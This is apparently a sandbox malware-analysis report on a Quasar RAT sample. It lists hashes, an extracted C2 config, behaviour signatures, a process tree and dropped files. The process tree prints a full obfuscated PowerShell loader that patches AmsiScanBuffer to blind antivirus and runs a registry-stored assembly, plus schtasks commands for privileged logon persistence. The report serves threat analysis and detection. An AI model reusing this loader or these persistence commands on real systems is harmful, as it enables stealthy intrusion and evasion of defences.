Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-05-2024 20:59

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 57 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:556
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1004
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{504c7b37-2943-4730-961f-83facd9a801e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1808
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:748
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:904
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:364
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                1⤵
                  PID:700
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                  1⤵
                    PID:392
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                    1⤵
                      PID:1084
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1108
                        • c:\windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:2560
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XpMchrrYmBmr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gtYgstQGBCDczT,[Parameter(Position=1)][Type]$whmonOMCVD)$OHNbQofbAED=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'le'+'g'+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+'Modu'+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'eType',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+'d'+','+[Char](65)+'nsi'+'C'+'la'+[Char](115)+'s'+','+'A'+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$OHNbQofbAED.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+'a'+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$gtYgstQGBCDczT).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+'m'+'e'+''+','+''+[Char](77)+''+'a'+''+[Char](110)+'ag'+'e'+''+'d'+'');$OHNbQofbAED.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$whmonOMCVD,$gtYgstQGBCDczT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $OHNbQofbAED.CreateType();}$bRQJQvFVafcMg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+'r'+''+'o'+'s'+'o'+''+'f'+''+'t'+''+[Char](46)+''+'W'+''+[Char](105)+'n'+'3'+''+[Char](50)+''+'.'+'U'+[Char](110)+''+'s'+''+'a'+'f'+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+'t'+'h'+''+[Char](111)+'d'+[Char](115)+'');$HuAegBQHRJyZmp=$bRQJQvFVafcMg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+'r'+''+'o'+''+[Char](99)+''+[Char](65)+'dd'+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tJkmUMtVBrPZzzEFCHP=XpMchrrYmBmr @([String])([IntPtr]);$ceFxgFgWyTleyubNrqmZvj=XpMchrrYmBmr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rBAemSOySSV=$bRQJQvFVafcMg.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+'l')));$vPbAcEFmdUXCqv=$HuAegBQHRJyZmp.Invoke($Null,@([Object]$rBAemSOySSV,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$tBZuuLsnPmtbsCqTz=$HuAegBQHRJyZmp.Invoke($Null,@([Object]$rBAemSOySSV,[Object](''+'V'+'i'+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$ooguVaN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vPbAcEFmdUXCqv,$tJkmUMtVBrPZzzEFCHP).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$WHbTPmwfSsRyGGsOz=$HuAegBQHRJyZmp.Invoke($Null,@([Object]$ooguVaN,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+'a'+'n'+'B'+[Char](117)+''+[Char](102)+'f'+'e'+''+[Char](114)+'')));$XmCRhVRXFC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tBZuuLsnPmtbsCqTz,$ceFxgFgWyTleyubNrqmZvj).Invoke($WHbTPmwfSsRyGGsOz,[uint32]8,4,[ref]$XmCRhVRXFC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WHbTPmwfSsRyGGsOz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tBZuuLsnPmtbsCqTz,$ceFxgFgWyTleyubNrqmZvj).Invoke($WHbTPmwfSsRyGGsOz,[uint32]8,0x20,[ref]$XmCRhVRXFC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:824
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1192
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1212
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s EventSystem
                              1⤵
                                PID:1236
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                1⤵
                                  PID:1252
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                  1⤵
                                    PID:1396
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                    1⤵
                                      PID:1436
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                      1⤵
                                        PID:1464
                                        • c:\windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:3000
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                          1⤵
                                            PID:1504
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                            1⤵
                                              PID:1556
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                              1⤵
                                                PID:1624
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1640
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                  1⤵
                                                    PID:1696
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1744
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1756
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                        1⤵
                                                          PID:1848
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                          1⤵
                                                            PID:1868
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:1972
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                              1⤵
                                                                PID:2056
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                PID:2220
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                1⤵
                                                                  PID:2248
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                  1⤵
                                                                    PID:2260
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2280
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                      1⤵
                                                                        PID:2320
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                        1⤵
                                                                          PID:2340
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2364
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                          1⤵
                                                                            PID:2432
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                            1⤵
                                                                              PID:2452
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                              1⤵
                                                                                PID:2772
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2936
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:3020
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                    1⤵
                                                                                      PID:3164
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3324
                                                                                        • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                          2⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3496
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:828
                                                                                          • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:204
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                              4⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:1148
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4780
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:2712
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3832
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:4008
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                            1⤵
                                                                                              PID:4732
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:4560
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2116
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2480
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:4416
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:4440
                                                                                                  • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:1276
                                                                                                    • C:\Windows\System32\InstallAgent.exe
                                                                                                      C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:2724
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                        1⤵
                                                                                                          PID:4700
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:4472

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                          Filesize

                                                                                                          162KB

                                                                                                          MD5

                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                          SHA1

                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                          SHA256

                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                          SHA512

                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                          Filesize

                                                                                                          409KB

                                                                                                          MD5

                                                                                                          a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                          SHA1

                                                                                                          3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                          SHA256

                                                                                                          43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                          SHA512

                                                                                                          458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_osy1rac1.rcb.ps1
                                                                                                          Filesize

                                                                                                          1B

                                                                                                          MD5

                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                          SHA1

                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                          SHA256

                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                          SHA512

                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                          Filesize

                                                                                                          338B

                                                                                                          MD5

                                                                                                          db0c28b143328aa0827c82c7c414e922

                                                                                                          SHA1

                                                                                                          fd39796b8d7b8099731c12dfe24885b412236316

                                                                                                          SHA256

                                                                                                          f83b03491ed3220a52cae0dc6b1bf9786f177d1090b25490922391e8601342bd

                                                                                                          SHA512

                                                                                                          558b89281d2a761bd77e3963ce03ae59becb4a83f30af1d6b333f0060e9e79ba034465eb01774fa8a120d3c8cb9a48883d3969d2b278347ab270ac7d1402a60e

                                                                                                        • memory/204-13-0x0000000073E80000-0x000000007456E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/204-671-0x0000000073E80000-0x000000007456E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/204-14-0x0000000073E80000-0x000000007456E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/204-672-0x0000000073E80000-0x000000007456E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/204-46-0x00000000064D0000-0x00000000064DA000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/556-73-0x00007FFF76EF0000-0x00007FFF76F00000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/556-66-0x0000024A82AE0000-0x0000024A82B0B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/556-65-0x0000024A82AE0000-0x0000024A82B0B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/556-72-0x0000024A82AE0000-0x0000024A82B0B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/556-64-0x0000024A82AB0000-0x0000024A82AD5000-memory.dmp
                                                                                                          Filesize

                                                                                                          148KB

                                                                                                        • memory/636-77-0x0000016AD5860000-0x0000016AD588B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/636-84-0x00007FFF76EF0000-0x00007FFF76F00000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/636-83-0x0000016AD5860000-0x0000016AD588B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/748-88-0x00000199BE770000-0x00000199BE79B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/748-95-0x00007FFF76EF0000-0x00007FFF76F00000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/748-94-0x00000199BE770000-0x00000199BE79B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/824-25-0x00000231F2E90000-0x00000231F2EB2000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/824-47-0x00000231F3150000-0x00000231F317A000-memory.dmp
                                                                                                          Filesize

                                                                                                          168KB

                                                                                                        • memory/824-49-0x00007FFFB5970000-0x00007FFFB5A1E000-memory.dmp
                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/824-48-0x00007FFFB6E60000-0x00007FFFB703B000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                        • memory/824-28-0x00000231F3190000-0x00000231F3206000-memory.dmp
                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/904-105-0x00000225B9B90000-0x00000225B9BBB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/904-106-0x00007FFF76EF0000-0x00007FFF76F00000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/904-99-0x00000225B9B90000-0x00000225B9BBB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/1004-110-0x0000024D48A50000-0x0000024D48A7B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/1808-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1808-58-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1808-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1808-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1808-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1808-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/1808-59-0x00007FFFB6E60000-0x00007FFFB703B000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                        • memory/1808-60-0x00007FFFB5970000-0x00007FFFB5A1E000-memory.dmp
                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/3496-20-0x0000000073E80000-0x000000007456E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/3496-6-0x0000000005250000-0x0000000005262000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/3496-7-0x0000000005D40000-0x0000000005D7E000-memory.dmp
                                                                                                          Filesize

                                                                                                          248KB

                                                                                                        • memory/3496-0-0x0000000073E8E000-0x0000000073E8F000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/3496-4-0x0000000073E80000-0x000000007456E000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.9MB

                                                                                                        • memory/3496-5-0x0000000004CF0000-0x0000000004D56000-memory.dmp
                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/3496-3-0x0000000004DB0000-0x0000000004E42000-memory.dmp
                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/3496-2-0x00000000052B0000-0x00000000057AE000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.0MB

                                                                                                        • memory/3496-1-0x0000000000420000-0x000000000048C000-memory.dmp
                                                                                                          Filesize

                                                                                                          432KB